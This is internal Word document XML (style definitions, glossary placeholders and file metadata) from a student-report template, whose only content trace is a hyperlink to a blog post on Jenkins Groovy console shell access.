    <w:rsid w:val="00F82CCE"/>
    <w:rsid w:val="00F8488A"/>
    <w:rsid w:val="00F90742"/>
    <w:rsid w:val="00F92871"/>
    <w:rsid w:val="00F96C23"/>
    <w:rsid w:val="00F97FD6"/>
    <w:rsid w:val="00FB2D6E"/>
    <w:rsid w:val="00FC7870"/>
    <w:rsid w:val="00FD55E8"/>
    <w:rsid w:val="00FD59F4"/>
    <w:rsid w:val="00FD7C22"/>
    <w:rsid w:val="00FD7CA0"/>
    <w:rsid w:val="00FE09F4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A7F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E872FA"/>
    <w:pPr>
      <w:spacing w:line="48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8D5E3D"/>
    <w:pPr>
      <w:spacing w:before="90" w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="11" w:right="-11"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:caps/>
      <w:color w:val="4354A2" w:themeColor="accent1"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:aliases w:val="Index"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="000D719D"/>
    <w:pPr>
      <w:ind w:left="15"/>
      <w:jc w:val="both"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Segoe UI"/>
      <w:color w:val="4354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semiHidden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semiHidden/>
    <w:rsid w:val="0078163A"/>
    <w:rPr>
      <w:sz w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008D5E3D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:ind w:left="697" w:hanging="357"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TextBody">
    <w:name w:val="Text Body"/>
    <w:basedOn w:val="BodyText"/>
    <w:link w:val="TextBodyChar"/>
    <w:uiPriority w:val="7"/>
    <w:semiHidden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semiHidden/>
    <w:rsid w:val="00946B83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Subhead">
    <w:name w:val="Subhead"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SubheadChar"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="005C684A"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="14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SubheadChar">
    <w:name w:val="Subhead Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subhead"/>
    <w:uiPriority w:val="3"/>
    <w:rsid w:val="00946B83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TableHeader">
    <w:name w:val="Table Header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TableHeaderChar"/>
    <w:uiPriority w:val="8"/>
    <w:qFormat/>
    <w:rsid w:val="00E872FA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character" w:customStyle="1" w:styleId="TableHeaderChar">
    <w:name w:val="Table Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="TableHeader"/>
    <w:uiPriority w:val="8"/>
    <w:rsid w:val="00E872FA"/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paragraph" w:customStyle="1" w:styleId="PictureInfo">
    <w:name w:val="Picture Info"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="8"/>
    <w:rsid w:val="00BC268E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:bCs/>
      <w:color w:val="4354A2" w:themeColor="accent1"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="2"/>
    <w:rsid w:val="00946B83"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:caps/>
      <w:color w:val="4354A2" w:themeColor="accent1"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:aliases w:val="Index Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00E07642"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Segoe UI"/>
      <w:color w:val="4354A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946B83"/>
    <w:rPr>
      <w:rFonts w:ascii="Gill Sans MT" w:hAnsi="Gill Sans MT"/>
      <w:b/>
      <w:color w:val="4354A2" w:themeColor="accent1"/>
      <w:spacing w:val="40"/>
      <w:sz w:val="2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Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Foot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qFormat/>
    <w:rsid w:val="00D6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D60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9E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246A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946B83"/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paragraph" w:customStyle="1" w:styleId="CoverInfo">
    <w:name w:val="Cover Info"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007246A9"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="4354A2" w:themeColor="accent1"/>
      <w:spacing w:val="30"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableOfContent">
    <w:name w:val="Table Of Content"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008D5E3D"/>
    <w:rPr>
      <w:color w:val="4354A2" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableData">
    <w:name w:val="Table Data"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E872FA"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableHeaderLeft">
    <w:name w:val="Table Header Left"/>
    <w:basedOn w:val="TableHeader"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E872FA"/>
    <w:pPr>
      <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:y="-9"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00544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0188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97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blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a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437\AppData\Roaming\Microsoft\Templates\Classic%20student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AAF5C8A0142D298EF8C451CB26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F3434-FA0B-40BE-BFAE-08AE26299F18}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00EF5965" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="B1EAAF5C8A0142D298EF8C451CB26F11"/>
          </w:pPr>
          <w:r w:rsidRPr="004F49D8">
            <w:t>/</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="4F9296769E1C42BEA3917A36BF19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89DF2-6095-4B06-A361-85AE01EC0420}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00EF5965" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="4F9296769E1C42BEA3917A36BF199242"/>
          </w:pPr>
          <w:r w:rsidRPr="004F49D8">
            <w:t>/</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="DA0F5CB3272F444F8012601533398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8AD2-FFC4-4EB5-87C7-C3745A3E3740}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00EF5965" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="DA0F5CB3272F444F8012601533398FBC"/>
          </w:pPr>
          <w:r w:rsidRPr="006C3507">
            <w:t>TABLE OF CONTENTS</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="5C6E5A11AAF64FF6B93078D9D67A7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F9876-13ED-4C74-9081-9B05EC460F24}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00EF5965" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="5C6E5A11AAF64FF6B93078D9D67A7C47"/>
          </w:pPr>
          <w:r>
            <w:t>Subheading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 w16cid:durableId="18211181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84"/>
    <w:rsid w:val="00110484"/>
    <w:rsid w:val="00A54666"/>
    <w:rsid w:val="00D30F2E"/>
    <w:rsid w:val="00DF376D"/>
    <w:rsid w:val="00E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AAF5C8A0142D298EF8C451CB26F11">
    <w:name w:val="B1EAAF5C8A0142D298EF8C451CB26F11"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="4F9296769E1C42BEA3917A36BF199242">
    <w:name w:val="4F9296769E1C42BEA3917A36BF199242"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DA0F5CB3272F444F8012601533398FBC">
    <w:name w:val="DA0F5CB3272F444F8012601533398FBC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5C6E5A11AAF64FF6B93078D9D67A7C47">
    <w:name w:val="5C6E5A11AAF64FF6B93078D9D67A7C47"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
      <w:ind w:left="697" w:hanging="357"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20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8A8D3B1-2102-46A0-9CF2-DC547FD45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806DB-A158-4EB9-B245-2C82C7BAA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D79E4-CF0C-4DDA-BB82-2A2F72AB4A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report.dotx</Template>
  <TotalTime>0</TotalTime>
  <Pages>10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2023-11-04T00:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-19T18:17:00Z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